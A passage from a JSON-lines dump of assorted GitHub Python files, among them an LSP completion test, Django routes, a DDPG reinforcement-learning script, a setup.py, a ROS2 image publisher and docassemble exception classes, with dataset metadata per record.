'eol'})\n\n self.client.responses['textDocument/completion'] = edit_after_nonword\n handler = self.get_view_event_listener(\"on_query_completions\")\n self.assertIsNotNone(handler)\n if handler:\n handler.on_query_completions(\"\", [6])\n yield 100\n # note: invoking on_text_command manually as sublime doesn't call it.\n handler.on_text_command('insert_best_completion', {})\n self.view.run_command(\"insert_best_completion\", {})\n yield 100\n self.assertEquals(\n self.view.substr(sublime.Region(0, self.view.size())),\n 'List.apply()')\n\n def test_additional_edits(self):\n yield 100\n self.client.responses[\n 'textDocument/completion'] = completion_with_additional_edits\n handler = self.get_view_event_listener(\"on_query_completions\")\n self.assertIsNotNone(handler)\n if handler:\n handler.on_query_completions(\"\", [1])\n yield 100\n # note: invoking on_text_command manually as sublime doesn't call it.\n handler.on_text_command('insert_best_completion', {})\n self.view.run_command(\"insert_best_completion\", {})\n yield 100\n self.assertEquals(\n self.view.substr(sublime.Region(0, self.view.size())),\n 'import asdf;\\nasdf')\n\n def test_resolve_for_additional_edits(self):\n yield 100\n self.client.responses['textDocument/completion'] = label_completions\n self.client.responses[\n 'completionItem/resolve'] = completion_with_additional_edits[0]\n\n handler = self.get_view_event_listener(\"on_query_completions\")\n self.assertIsNotNone(handler)\n if handler:\n handler.on_query_completions(\"\", [1])\n\n # note: ideally the handler is initialized with resolveProvider capability\n handler.resolve = True\n\n yield 100\n # note: invoking on_text_command manually as sublime doesn't call it.\n handler.on_text_command('insert_best_completion', {})\n self.view.run_command(\"insert_best_completion\", {})\n yield 100\n self.assertEquals(\n self.view.substr(sublime.Region(0, self.view.size())),\n 'import asdf;\\nasdf')\n handler.resolve = False\n","repo_name":"11bit/LSP","sub_path":"tests/test_completion.py","file_name":"test_completion.py","file_ext":"py","file_size_in_byte":12818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"5963916212","text":"from django.urls import path\n\nfrom user import views\n\nurlpatterns = [\n path('admin', views.adminPanel),\n path('addNotice', views.addNotice),\n path('addIntro', views.addIntro),\n path('viewNotice', views.viewNotice),\n path('viewCustomer', views.viewCustomer),\n path('viewAppointment', views.viewAppointment),\n path('viewIntro', views.viewIntro),\n path('editNotice/<int:c_id>', views.editNotice),\n path('editIntro/<int:c_id>', views.editIntro),\n path('updateIntro/<int:c_id>', views.updateIntro),\n path('updateNotice/<int:c_id>', views.updateNotice),\n path('deleteIntro/<int:c_id>', views.deleteIntro),\n path('deleteNotice/<int:c_id>', views.deleteNotice),\n path('sortViewCustomer/<str:sortedBy>', views.sortViewCustomer),\n\n]","repo_name":"sanjiv576/school_website","sub_path":"school/user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"11146731142","text":"import json\nimport sling\nimport sling.media.photo as photolib\n\nclass DupsService:\n def handle(self, request):\n r = json.loads(request.body)\n itemid = r.get(\"itemid\")\n images = r[\"images\"]\n existing = r[\"existing\"]\n\n # Try to preload image fingerprints from cache.\n photolib.load_fingerprints(images)\n photolib.load_fingerprints(existing)\n\n # Compute image hash for existing photos.\n photos = {}\n for url in existing:\n photo = photolib.get_photo(itemid, url)\n if photo is None: continue\n photos[photo.fingerprint] = photo\n\n # Compute image hash for each photo to detect duplicates.\n dups = []\n missing = []\n for url in images:\n # Skip videos.\n if photolib.is_video(url): continue\n\n # Get photo information.\n photo = photolib.get_photo(itemid, url)\n if photo is None:\n missing.append(url)\n continue\n\n # Check for duplicate.\n dup = photos.get(photo.fingerprint)\n if dup is not None:\n dups.append({\n \"url\": url,\n \"width\": photo.width,\n \"height\": photo.height,\n \"bigger\": photo.size() > dup.size(),\n \"smaller\": photo.size() < dup.size(),\n \"dup\": {\n \"url\": dup.url,\n \"width\": dup.width,\n \"height\": dup.height,\n \"existing\": dup.url in existing,\n }\n })\n\n # Add photo fingerprint for new or bigger photos.\n if dup is None or dup.size() < photo.size():\n photos[photo.fingerprint] = photo\n\n return {\"dups\": dups, \"missing\": missing}\n\n","repo_name":"ringgaard/sling","sub_path":"case/service/photodups.py","file_name":"photodups.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"32"} +{"seq_id":"37297224507","text":"nombres=[]\nnum_gente = int(input('Cuanta gente hay en la lista: '))\nnum_gente - 1\nif num_gente > 0:\n for i in range(num_gente):\n nombres.append(i)\n nombres[i] = input('Cual es el nombre: ')\n print(nombres)\nelse:\n print('Valor incorrecto')\nprint()","repo_name":"manusam/repopython","sub_path":"p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"9947671800","text":"class Solution:\n def minScore(self, n: int, roads: List[List[int]]) -> int:\n parent = list(range(n + 1))\n size = [1]*(n + 1)\n minDistance = [float('inf') for i in range(n + 1)]\n \n def find(x):\n if x != parent[x]:\n parent[x] = find(parent[x])\n return parent[x]\n \n def union(x,y,weight):\n xroot = find(x)\n yroot = find(y)\n rootMin = min(minDistance[xroot],minDistance[yroot])\n \n if size[xroot] >= size[yroot]:\n \n parent[yroot] = xroot\n minDistance[xroot] = min(weight,rootMin)\n size[xroot] += size[yroot]\n else:\n parent[xroot] = yroot\n minDistance[yroot] = min(weight,rootMin)\n size[yroot] += size[xroot]\n \n for start, end ,weight in roads:\n union(start, end,weight)\n \n return minDistance[find(1)]","repo_name":"Gizaw-Agodo/A2sV","sub_path":"2492-minimum-score-of-a-path-between-two-cities/2492-minimum-score-of-a-path-between-two-cities.py","file_name":"2492-minimum-score-of-a-path-between-two-cities.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"72713101531","text":"#!/usr/bin/env python\n\"\"\"\nPython setup script for the macos-oslog project.\n\"\"\"\n\nimport os\nimport re\n# setuptools needs to be imported before distutils in order to work.\nimport setuptools\n\n# pylint: disable=wrong-import-order,deprecated-module\nfrom distutils.core import Extension\n\n\ndef get_version(version_file):\n \"\"\"\n Parse the specified version file (C format) and return the value of the\n __version__ global variable that is set in the version file.\n \"\"\"\n # pylint: disable=unspecified-encoding\n with open(version_file, 'r') as fp:\n for line in fp:\n m = re.search(r'__version__ += +\"(.*)\";', line)\n if m:\n return m.group(1)\n raise ValueError(\n \"Could not find version in {}\".format(version_file))\n\n\ndef get_requirements(requirements_file):\n \"\"\"\n Parse the specified requirements file and return a list of its non-empty,\n non-comment lines. The returned lines are without any trailing newline\n characters.\n \"\"\"\n # pylint: disable=unspecified-encoding\n with open(requirements_file, 'r') as fp:\n lines = fp.readlines()\n reqs = []\n for line in lines:\n line = line.strip('\\n')\n if not line.startswith('#') and line != '':\n reqs.append(line)\n return reqs\n\n\ndef read_file(a_file):\n \"\"\"\n Read the specified file and return its content as one string.\n \"\"\"\n # pylint: disable=unspecified-encoding\n with open(a_file, 'r') as fp:\n content = fp.read()\n return content\n\n\n# pylint: disable=invalid-name\nrequirements = get_requirements('requirements.txt')\ninstall_requires = [req for req in requirements\n if req and not re.match(r'[^:]+://', req)]\ndependency_links = [req for req in requirements\n if req and re.match(r'[^:]+://', req)]\n\npackage_version = get_version(os.path.join('src', 'macos_oslog.c'))\n\n# Docs on setup():\n# * https://docs.python.org/2.7/distutils/apiref.html?\n# highlight=setup#distutils.core.setup\n# * https://setuptools.readthedocs.io/en/latest/setuptools.html#\n# new-and-changed-setup-keywords\nsetuptools.setup(\n name='macos-oslog',\n version=package_version,\n packages=[\n ],\n ext_modules=[\n Extension(\"macos_oslog\", [\"src/macos_oslog.c\"])\n ],\n include_package_data=True, # Includes MANIFEST.in files into sdist (only)\n scripts=[\n # add any scripts\n ],\n install_requires=install_requires,\n dependency_links=dependency_links,\n extras_require={},\n cmdclass={},\n description=(\"Python bindings for the unified logging and tracing \"\n \"system of macOS\"),\n long_description=read_file('README.rst'),\n long_description_content_type='text/x-rst',\n license=\"Apache Software License 2.0\",\n author=\"Andreas Maier\",\n author_email='andreas.r.maier@gmx.de',\n maintainer=\"Andreas Maier\",\n maintainer_email='andreas.r.maier@gmx.de',\n url='https://github.com/andy-maier/macos-oslog',\n project_urls={\n 'Bug Tracker': 'https://github.com/andy-maier/macos-oslog/issues',\n 'Documentation': 'https://andy-maier.github.io/macos-oslog/html/docs/',\n 'Source Code': 'https://github.com/andy-maier/macos-oslog',\n },\n\n options={'bdist_wheel': {'universal': True}},\n zip_safe=True, # This package can safely be installed from a zip file\n platforms='Darwin',\n\n python_requires='>=3.5',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: MacOS',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9',\n 'Programming Language :: Python :: 3.10',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ]\n)\n","repo_name":"andy-maier/macos-oslog","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"6820213145","text":"from settings import *\n\n\nclass Cache:\n def __init__(self):\n self.stacked_sprite_cache = {}\n self.entity_sprite_cache = {}\n self.viewing_angle = 360 // NUM_ANGLES\n self.outline_thickness = 5\n self.alpha_value = 70 #\n self.get_stacked_sprite_cache()\n self.get_entity_sprite_cache()\n\n def get_entity_sprite_cache(self):\n for sprite_name in ENTITY_SPRITE_ATTRS:\n self.entity_sprite_cache[sprite_name] = {\n 'images': None\n }\n attrs = ENTITY_SPRITE_ATTRS[sprite_name]\n images = self.get_layer_array(attrs)\n self.entity_sprite_cache[sprite_name]['images'] = images\n\n mask = self.get_entity_mask(attrs, images)\n self.entity_sprite_cache[sprite_name]['mask'] = mask\n\n def get_entity_mask(self, attrs, images):\n path = attrs.get('mask_path', False)\n if not path:\n return pg.mask.from_surface(images[0])\n else:\n scale = attrs['scale']\n mask_image = pg.image.load(path).convert_alpha()\n mask_image = pg.transform.scale(mask_image, vec2(mask_image.get_size()) * scale)\n return pg.mask.from_surface(mask_image)\n\n def get_stacked_sprite_cache(self):\n for obj_name in STACKED_SPRITE_ATTRS:\n self.stacked_sprite_cache[obj_name] = {\n 'rotated_sprites': {},\n 'alpha_sprites': {},\n 'collision_masks': {}\n }\n attrs = STACKED_SPRITE_ATTRS[obj_name]\n layer_array = self.get_layer_array(attrs)\n self.run_prerender(obj_name, layer_array, attrs)\n\n def run_prerender(self, obj_name, layer_array, attrs):\n outline = attrs.get('outline', True)\n transparency = attrs.get('transparency', False)\n mask_layer = attrs.get('mask_layer', attrs['num_layers'] // 2)\n\n for angle in range(NUM_ANGLES):\n surf = pg.Surface(layer_array[0].get_size())\n surf = pg.transform.rotate(surf, angle * self.viewing_angle)\n sprite_surf = pg.Surface([surf.get_width(), surf.get_height()\n + attrs['num_layers'] * attrs['scale']])\n sprite_surf.fill('khaki')\n sprite_surf.set_colorkey('khaki')\n\n for ind, layer in enumerate(layer_array):\n layer = pg.transform.rotate(layer, angle * self.viewing_angle)\n sprite_surf.blit(layer, (0, ind * attrs['scale']))\n\n # get collision mask\n if ind == mask_layer:\n surf = pg.transform.flip(sprite_surf, True, True)\n mask = pg.mask.from_surface(surf)\n self.stacked_sprite_cache[obj_name]['collision_masks'][angle] = mask\n\n # get outline\n if outline:\n outline_coords = pg.mask.from_surface(sprite_surf).outline()\n pg.draw.polygon(sprite_surf, 'black', outline_coords, self.outline_thickness)\n\n # get alpha sprites\n if transparency: #\n alpha_sprite = sprite_surf.copy()\n alpha_sprite.set_alpha(self.alpha_value)\n alpha_sprite = pg.transform.flip(alpha_sprite, True, True)\n self.stacked_sprite_cache[obj_name]['alpha_sprites'][angle] = alpha_sprite\n\n image = pg.transform.flip(sprite_surf, True, True)\n self.stacked_sprite_cache[obj_name]['rotated_sprites'][angle] = image\n\n\n\n def get_layer_array(self, attrs):\n # load sprite sheet\n sprite_sheet = pg.image.load(attrs['path']).convert_alpha()\n # scaling\n sprite_sheet = pg.transform.scale(sprite_sheet,\n vec2(sprite_sheet.get_size()) * attrs['scale'])\n sheet_width = sprite_sheet.get_width()\n sheet_height = sprite_sheet.get_height()\n sprite_height = sheet_height // attrs['num_layers']\n # new height to prevent error\n sheet_height = sprite_height * attrs['num_layers']\n # get sprites\n layer_array = []\n for y in range(0, sheet_height, sprite_height):\n sprite = sprite_sheet.subsurface((0, y, sheet_width, sprite_height))\n layer_array.append(sprite)\n return layer_array[::-1]","repo_name":"StanislavPetrovV/SpriteStacking","sub_path":"cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"32"} +{"seq_id":"22050888240","text":"def fibonacci_sequence():\n '''\n Find the sum of even valued terms where the sequence does not exceed four million\n '''\n cur = 1\n res = 0\n prev1 = 0\n prev2 = 0\n while cur <= 4000000:\n if prev1 == 0 and prev2 == 0:\n prev1 = cur\n cur = cur + prev1\n elif prev1 != 0 and prev2 == 0:\n prev2 = cur \n cur = cur + prev1\n else:\n prev1 = prev2 \n prev2 = cur\n cur = prev1 + prev2\n if cur % 2 == 0:\n res += cur\n return res\nif __name__ == \"__main__\":\n res = fibonacci_sequence()\n print(res)","repo_name":"jtbryan/ProjectEuler","sub_path":"problem_2.py","file_name":"problem_2.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1711214505","text":"import requests\n\nfrom archive_records.models import ArchiveRecord\n\n\ndef get_record_from_national_archives(record_id):\n response = requests.get(\n url=f\"http://discovery.nationalarchives.gov.uk/API/records/v1/details/{record_id}\"\n )\n return response\n\n\ndef format_and_save_record_to_database(response):\n try:\n record = response.json()\n record_id = record['id']\n record_title = record.get('title', '')\n scope_content = record.get('scopeContent', {})\n description = scope_content.get('description', \"\")\n citable_reference = record.get('citableReference', \"\")\n\n archive_record = ArchiveRecord(\n reference_id=record_id,\n title=record_title,\n description=description,\n citable_reference=citable_reference\n )\n archive_record.save()\n return True\n\n except Exception:\n return False\n","repo_name":"sibin-impress/national-archives-data-import","sub_path":"archive_records/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25549550840","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport sys\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\n\nimport rclpy\nfrom rclpy.node import Node\nimport cv2\n\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\n\nfrom std_msgs.msg import Bool\nimport time \n\nclass image_folder_publisher(Node):\n def __init__(self):\n super().__init__(\"image_folder_publisher\")\n self.__app_name = \"image_folder_publisher\"\n\n self._cv_bridge = CvBridge()\n\n self.total_imgs = 600\n\n self._topic_name = '/camera/image_raw'\n self.get_logger().info(f\"{self.__app_name} (topic_name) Publishing Images to topic {self._topic_name}\")\n\n self._image_publisher = self.create_publisher(Image, self._topic_name, 10)\n\n self._rate = 30\n self.get_logger().info(f\"{self.__app_name} (publish_rate) Publish rate set to {self._rate} hz\")\n\n self.seq = 0\n\n self._image_folder = '/home/gdpmobile5/TelevisionClip_1080P-3758.mkv'\n self.vc = None\n self.img = 0\n\n self.stop_pub = self.create_publisher(Bool, '/stop', 1) \n \n self.start_sub = self.create_subscription(Bool, '/start', self.start_images, 10)\n\n\n def stop_callback(self):\n self.get_logger().info(\"Sending stop!\")\n self.stop_pub.publish(Bool())\n\n def start_images(self, msg):\n self.get_logger().info(\"Starting to send images!\")\n self.timer = self.create_timer(1 / self._rate, self.run)\n\n def run(self):\n try:\n if not self.vc:\n self.vc = cv2.VideoCapture(self._image_folder)\n if self.total_imgs <= self.seq:\n time.sleep(15)\n self.stop_callback()\n return\n rval, cv_image = self.vc.read()\n if cv_image is not None:\n ros_msg = self._cv_bridge.cv2_to_imgmsg(cv_image, \"bgr8\")\n ros_msg.header.frame_id = str(self.seq)\n ros_msg.header.stamp = self.get_clock().now().to_msg()\n self._image_publisher.publish(ros_msg)\n self.seq += 1\n # print(f\"{self.__app_name} Published {join(self._image_folder, f)}\")\n self.img += 1\n except CvBridgeError as e:\n print(e)\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n image_publisher = image_folder_publisher()\n rclpy.spin(image_publisher)\n rclpy.shutdown()\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"KDharmarajanDev/image-transport-benchmarking","sub_path":"image_transport_benchmarker/video_publisher.py","file_name":"video_publisher.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39401509378","text":"import os\nimport appdirs\nimport subprocess\nimport platform\n\n\ndef open_user_config():\n # modified from https://github.com/KillianLucas/open-interpreter/blob/be38ef8ed6ce9d0b7768e2ec3f542337f3444f54/interpreter/cli/cli.py#L101\n # MIT license\n config_path = os.path.join(appdirs.user_config_dir(), 'Open-Creator', 'config.yaml')\n config_path = os.path.join(appdirs.user_config_dir(), 'Open-Creator', 'config.yaml')\n print(f\"Opening `{config_path}`...\")\n # Use the default system editor to open the file\n if platform.system() == 'Windows':\n os.startfile(config_path) # This will open the file with the default application, e.g., Notepad\n else:\n try:\n # Try using xdg-open on non-Windows platforms\n subprocess.call(['xdg-open', config_path])\n except FileNotFoundError:\n # Fallback to using 'open' on macOS if 'xdg-open' is not available\n subprocess.call(['open', config_path])\n","repo_name":"timedomain-tech/open-creator","sub_path":"creator/config/open_config.py","file_name":"open_config.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"32"} +{"seq_id":"1264252358","text":"\n\nimport sys, os\ncurr_dir = os.path.dirname(os.path.realpath(__file__))\nupPath = curr_dir+'/../'\nsys.path.append(upPath)\n\nimport gym\n\nimport numpy as np\n\nimport tensorflow as tf\n\n\nfrom Actor import Actor\nfrom Critic import Critic\n\nfrom ReplayMemory import ReplayMemory\n\nfrom ExplorationNoise import OrnsteinUhlenbeckActionNoise as OUNoise\n\n\n\n\ndef build_summaries():\n\tepisode_reward = tf.Variable(0.)\n\ttf.summary.scalar(\"Reward\",episode_reward)\n\tcloss = tf.Variable(0.)\n\ttf.summary.scalar(\"closs\",closs)\n\tsummary_vars = [episode_reward, closs]\n\tsummary_ops = tf.summary.merge_all()\n\treturn summary_ops, summary_vars\n\n\nif __name__=='__main__':\n sess = tf.Session()\n\n env = gym.make('LunarLanderContinuous-v2')\n state = env.reset()\n\n actor = Actor(sess, env.action_space, env.observation_space)\n critic = Critic(sess, env.action_space, env.observation_space)\n sess.run(tf.global_variables_initializer())\n\n replayMemory = ReplayMemory(max_size=1000000)\n\n oun = OUNoise(mu=np.zeros(env.action_space.shape[0]))\n\n actor.update_target()\n critic.update_target()\n\n\n summary_ops, summary_vars = build_summaries()\n\n writer = tf.summary.FileWriter(\"./log\", sess.graph)\n\n episode_reward = 0\n\n closs = 0\n\n trainCount = 1\n\n episode = 1\n\n while True:\n #env.render()\n\n actionPure = actor.act(state)\n actionNoise = actionPure + oun()\n next_state, reward, done, info = env.step(actionNoise)\n\n replayMemory.add(state, actionNoise, reward, done, next_state, None)\n\n state = next_state\n\n episode_reward += reward\n\n if replayMemory.size() >= 10000:\n state_b, action_b, reward_b, done_b, next_state_b, prob_b = replayMemory.miniBatch(int(64))\n\n targetQ = critic.predict_target(next_state_b, actor.predict_target(next_state_b))\n yi = []\n for k in range(int(64)):\n if done_b[k]: # 结束,没有下个���态\n yi.append(reward_b[k])\n else:\n yi.append(reward_b[k] + 0.99 * targetQ[k])\n\n yx = np.reshape(yi, (int(64), 1)) # critic的目标\n closs += critic.train(state_b, action_b, yx)\n #print('closs = ', closs)\n actions_pred = actor.predict(state_b) # actions_pred与a_batch不一样,a_batch是加了噪声的\n grads = critic.get_action_gradients(state_b, actions_pred) # 算出Q对action的梯度\n actor.train(state_b, grads) # actor的参数朝Q变大的方向上稍微移动一点\n actor.update_target()\n critic.update_target()\n\n trainCount += 1\n\n if done:\n\n cavTrainLoss = closs/trainCount\n\n if cavTrainLoss == 0:\n cavTrainLoss = 100 #closs图看起来更正常\n\n summary_str = sess.run(summary_ops, feed_dict={summary_vars[0]: episode_reward, summary_vars[1]:cavTrainLoss})\n writer.add_summary(summary_str, episode)\n writer.flush()\n\n print(\"episode = \", episode, \"episode_reward = \", episode_reward, \"cavTrainLoss = \", cavTrainLoss)\n\n state = env.reset()\n\n oun.reset()\n\n episode_reward = 0\n\n closs = 0\n\n trainCount = 1\n\n episode += 1\n\n","repo_name":"war3gu/gykRL","sub_path":"DDPG/DDPG.py","file_name":"DDPG.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"40391878693","text":"class Road:\n\n def __init__(self, length:int, width:int):\n self._lenght = length\n self._width = width\n self.weight = 30\n self.height = 10\n\n def weight_asphalt(self):\n weight_asphalt = self._lenght * self._width * self.weight * self.height / 1000\n print('Для покрытия дорожного полотна неободимо {} т. массы асфальта'.format(round(weight_asphalt)))\n\nroad = Road(10000, 20)\nroad.weight_asphalt()\n","repo_name":"KremenenkoAlex/Python","sub_path":"lesson6/exp2.py","file_name":"exp2.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30702487934","text":"import re\n\n\nvalid_variable_match = re.compile(r'^[^\\d][A-Za-z0-9\\_]*$')\nmatch_brackets_or_dot = re.compile(r'(\\[.+?\\]|\\.[a-zA-Z_][a-zA-Z0-9_]*)')\n\nclass DAIndexError(IndexError):\n pass\n\n\nclass DAAttributeError(AttributeError):\n pass\n\n\nclass DAException(Exception):\n pass\n\n\nclass DAError(Exception):\n\n def __init__(self, value, code=501):\n self.value = value\n self.error_code = code\n super().__init__(value)\n\n def __str__(self):\n return str(self.value)\n\n\nclass DANotFoundError(Exception):\n pass\n\n\nclass DAInvalidFilename(Exception):\n pass\n\n\nclass DAValidationError(Exception):\n \"\"\"This is an Exception object that is used when raising an exception inside input validation code.\"\"\"\n\n def __init__(self, *pargs, field=None):\n self.field = field\n super().__init__(*pargs)\n\n\nclass CodeExecute(Exception):\n\n def __init__(self, compute, question):\n if isinstance(compute, list):\n self.compute = \"\\n\".join(compute)\n else:\n self.compute = compute\n self.question = question\n super().__init__()\n\n\nclass ForcedReRun(Exception):\n pass\n\n\nclass LazyNameError(NameError):\n pass\n\n\nclass DANameError(NameError):\n pass\n\n\ndef invalid_variable_name(varname):\n if not isinstance(varname, str):\n return True\n if re.search(r'[\\n\\r\\(\\)\\{\\}\\*\\^\\#]', varname):\n return True\n varname = re.sub(r'[\\.\\[].*', '', varname)\n if not valid_variable_match.match(varname):\n return True\n return False\n\n\ndef intrinsic_name_of(var_name, the_user_dict):\n from docassemble.base.util import DAObject # pylint: disable=import-outside-toplevel\n expression_as_list = [x for x in match_brackets_or_dot.split(var_name) if x != '']\n n = len(expression_as_list)\n i = n\n while i > 0:\n try:\n item = eval(var_name, the_user_dict)\n if isinstance(item, DAObject) and item.has_nonrandom_instance_name:\n var_name = item.instanceName\n break\n except:\n pass\n i -= 1\n var_name = ''.join(expression_as_list[0:i])\n return var_name + (''.join(expression_as_list[i:n]))\n\n\nclass ForcedNameError(NameError):\n\n def __init__(self, *pargs, **kwargs):\n super().__init__()\n the_args = list(pargs)\n if len(the_args) == 0:\n raise DAError(\"ForcedNameError must have at least one argument\")\n the_context = {}\n the_user_dict = kwargs.get('user_dict', {})\n for var_name in ('x', 'i', 'j', 'k', 'l', 'm', 'n'):\n if var_name in the_user_dict:\n the_context[var_name] = the_user_dict[var_name]\n first_is_plain = bool(isinstance(the_args[0], str))\n self.next_action = []\n evaluate = kwargs.get('evaluate', False)\n while len(the_args) > 0:\n arg = the_args.pop(0)\n if isinstance(arg, dict):\n if (len(arg.keys()) == 2 and 'action' in arg and 'arguments' in arg) or (len(arg.keys()) == 1 and 'action' in arg):\n arg['context'] = the_context\n self.set_action(arg)\n elif len(arg) == 1 and ('undefine' in arg or 'invalidate' in arg or 'recompute' in arg or 'set' in arg or 'follow up' in arg):\n if 'set' in arg:\n if isinstance(arg['set'], dict):\n arg['set'] = [arg['set']]\n if not isinstance(arg['set'], list):\n raise DAError(\"force_ask: the set statement must refer to a list.\")\n clean_list = []\n for the_dict in arg['set']:\n if not isinstance(the_dict, dict):\n raise DAError(\"force_ask: a set command must refer to a list of dicts.\")\n for the_var, the_val in the_dict.items():\n if not isinstance(the_var, str):\n raise DAError(\"force_ask: a set command must refer to a list of dicts with keys as variable names. \")\n the_var_stripped = the_var.strip()\n if invalid_variable_name(the_var_stripped):\n raise DAError(\"force_ask: missing or invalid variable name \" + repr(the_var) + \".\")\n clean_list.append([the_var_stripped, the_val])\n self.set_action({'action': '_da_set', 'arguments': {'variables': clean_list}, 'context': the_context})\n if 'follow up' in arg:\n if isinstance(arg['follow up'], str):\n arg['follow up'] = [arg['follow up']]\n if not isinstance(arg['follow up'], list):\n raise DAError(\"force_ask: the follow up statement must refer to a list.\")\n for var in arg['follow up']:\n if not isinstance(var, str):\n raise DAError(\"force_ask: invalid variable name \" + repr(var) + \" in follow up.\")\n var_saveas = var.strip()\n if invalid_variable_name(var_saveas):\n raise DAError(\"force_ask: missing or invalid variable name \" + repr(var_saveas) + \".\")\n if evaluate:\n var = intrinsic_name_of(var, the_user_dict)\n self.set_action({'action': var, 'arguments': {}, 'context': the_context})\n for command in ('undefine', 'invalidate', 'recompute'):\n if command not in arg:\n continue\n if isinstance(arg[command], str):\n arg[command] = [arg[command]]\n if not isinstance(arg[command], list):\n raise DAError(\"force_ask: the \" + command + \" statement must refer to a list. \")\n clean_list = []\n for undef_var in arg[command]:\n if not isinstance(undef_var, str):\n raise DAError(\"force_ask: invalid variable name \" + repr(undef_var) + \" in \" + command + \".\")\n undef_saveas = undef_var.strip()\n if invalid_variable_name(undef_saveas):\n raise DAError(\"force_ask: missing or invalid variable name \" + repr(undef_saveas) + \".\")\n if evaluate:\n undef_saveas = intrinsic_name_of(undef_saveas, the_user_dict)\n clean_list.append(undef_saveas)\n if command == 'invalidate':\n self.set_action({'action': '_da_invalidate', 'arguments': {'variables': clean_list}, 'context': the_context})\n else:\n self.set_action({'action': '_da_undefine', 'arguments': {'variables': clean_list}, 'context': the_context})\n if command == 'recompute':\n self.set_action({'action': '_da_compute', 'arguments': {'variables': clean_list}, 'context': the_context})\n else:\n raise DAError(\"Dictionaries passed to force_ask must have keys of 'action' and 'argument' only.\")\n else:\n if evaluate:\n arg = intrinsic_name_of(arg, the_user_dict)\n self.set_action({'action': arg, 'arguments': {}, 'context': the_context})\n if kwargs.get('gathering', False):\n self.next_action = None\n if first_is_plain:\n self.arguments = None\n\n def set_action(self, data):\n if (not hasattr(self, 'name')) or self.name is None:\n if isinstance(data, dict) and 'action' in data and (len(data) == 1 or 'arguments' in data):\n self.name = data['action']\n self.arguments = data.get('arguments', {})\n self.context = data.get('context', {})\n else:\n raise DAError(\"force_ask: invalid parameter \" + repr(data))\n self.next_action.append(data)\n\n\nclass DAErrorNoEndpoint(DAError):\n pass\n\n\nclass DAErrorMissingVariable(DAError):\n\n def __init__(self, value, variable=None, code=501):\n self.value = value\n self.variable = variable\n self.error_code = code\n super().__init__(value)\n\n\nclass DAErrorCompileError(DAError):\n pass\n\n\nclass MandatoryQuestion(Exception):\n\n def __init__(self):\n self.value = 'Mandatory Question'\n super().__init__()\n\n def __str__(self):\n return str(self.value)\n\n\nclass QuestionError(Exception):\n\n def __init__(self, *pargs, **kwargs):\n if len(pargs) >= 1:\n self.question = pargs[0]\n elif 'question' in kwargs:\n self.question = kwargs['question']\n else:\n self.question = \"Question not specified\"\n if len(pargs) >= 2:\n self.subquestion = pargs[1]\n elif 'subquestion' in kwargs:\n self.subquestion = kwargs['subquestion']\n else:\n self.subquestion = None\n if len(pargs) >= 3:\n self.url = pargs[2]\n elif 'url' in kwargs:\n self.url = kwargs['url']\n else:\n self.url = None\n if 'show_leave' in kwargs:\n self.show_leave = kwargs['show_leave']\n else:\n self.show_leave = None\n if 'show_exit' in kwargs:\n self.show_exit = kwargs['show_exit']\n else:\n self.show_exit = None\n if 'reload' in kwargs:\n self.reload = kwargs['reload']\n else:\n self.reload = None\n if 'show_restart' in kwargs:\n self.show_restart = kwargs['show_restart']\n else:\n self.show_restart = None\n if 'buttons' in kwargs:\n self.buttons = kwargs['buttons']\n else:\n self.buttons = None\n if 'dead_end' in kwargs:\n self.dead_end = kwargs['dead_end']\n else:\n self.dead_end = None\n super().__init__()\n\n def __str__(self):\n return str(self.question)\n\n\nclass BackgroundResponseError(Exception):\n\n def __init__(self, *pargs, **kwargs):\n if len(pargs) > 0 and len(kwargs) > 0:\n self.backgroundresponse = {'pargs': list(pargs), 'kwargs': kwargs}\n elif len(pargs) > 1:\n self.backgroundresponse = list(pargs)\n elif len(pargs) == 1:\n self.backgroundresponse = pargs[0]\n else:\n self.backgroundresponse = kwargs\n if 'sleep' in kwargs:\n self.sleep = kwargs['sleep']\n super().__init__()\n\n def __str__(self):\n if hasattr(self, 'backgroundresponse'):\n return str(self.backgroundresponse)\n return \"A 